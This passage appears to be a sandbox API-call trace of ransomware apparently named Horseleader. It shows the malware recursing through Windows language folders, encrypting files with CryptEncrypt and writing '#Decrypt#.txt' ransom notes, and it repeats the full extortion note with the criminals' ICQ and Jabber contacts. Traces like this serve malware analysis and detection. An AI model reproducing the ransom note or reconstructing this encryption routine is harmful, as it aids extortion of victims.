lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.886] lstrlenA 
(lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.886] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.888] lstrlenA (lpString="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") returned 1368 [0233.888] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.888] CloseHandle (hObject=0x158) returned 1 [0233.888] GetProcessHeap () returned 0x780000 [0233.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.888] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="he-IL", cAlternateFileName="")) returned 1 [0233.888] lstrcmpiW (lpString1="he-IL", lpString2="Windows") returned -1 [0233.888] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 60 [0233.889] lstrcmpW (lpString1="he-IL", lpString2=".") returned 1 [0233.889] lstrcmpW (lpString1="he-IL", lpString2="..") returned 1 [0233.889] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.889] GetProcessHeap () returned 0x780000 [0233.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0233.889] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*") returned 62 [0233.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\.") returned 62 [0233.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\..") returned 63 [0233.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.890] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0233.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.890] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned 76 [0233.890] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.890] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.890] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.890] lstrlenW (lpString=".testttjffg") returned 11 [0233.890] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.891] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.891] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.891] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\#Decrypt#.txt") returned 74 [0233.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.891] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.891] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.893] lstrlenA (lpString="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") returned 1368 [0233.893] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.893] CloseHandle (hObject=0x158) returned 1 [0233.893] GetProcessHeap () returned 0x780000 [0233.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.893] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0233.893] lstrcmpiW (lpString1="hr-HR", lpString2="Windows") returned -1 [0233.893] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 60 [0233.893] lstrcmpW (lpString1="hr-HR", lpString2=".") returned 1 [0233.893] lstrcmpW (lpString1="hr-HR", lpString2="..") returned 1 [0233.893] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.893] GetProcessHeap () returned 0x780000 [0233.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0233.893] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*") returned 62 [0233.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.894] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\.") returned 62 [0233.894] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.894] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.894] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\..") returned 63 [0233.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.894] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0233.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.894] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.895] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned 76 [0233.895] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.895] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.895] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.895] lstrlenW (lpString=".testttjffg") returned 11 [0233.895] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.895] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.895] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.895] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.895] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.895] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\#Decrypt#.txt") returned 74 [0233.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.896] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.896] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.897] lstrlenA (lpString="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") returned 1368 [0233.897] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.897] CloseHandle (hObject=0x158) returned 1 [0233.898] GetProcessHeap () returned 0x780000 [0233.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.898] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0233.898] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0233.898] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 60 [0233.898] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0233.898] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0233.898] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.898] GetProcessHeap () returned 0x780000 [0233.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0233.898] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*") returned 62 [0233.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.899] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\.") returned 62 [0233.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\..") returned 63 [0233.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.899] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0233.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0233.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0233.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned 76 [0233.899] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0233.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0233.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0233.899] lstrlenW (lpString=".testttjffg") returned 11 [0233.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0233.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.902] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0233.902] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.902] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\#Decrypt#.txt") returned 74 [0233.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.947] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
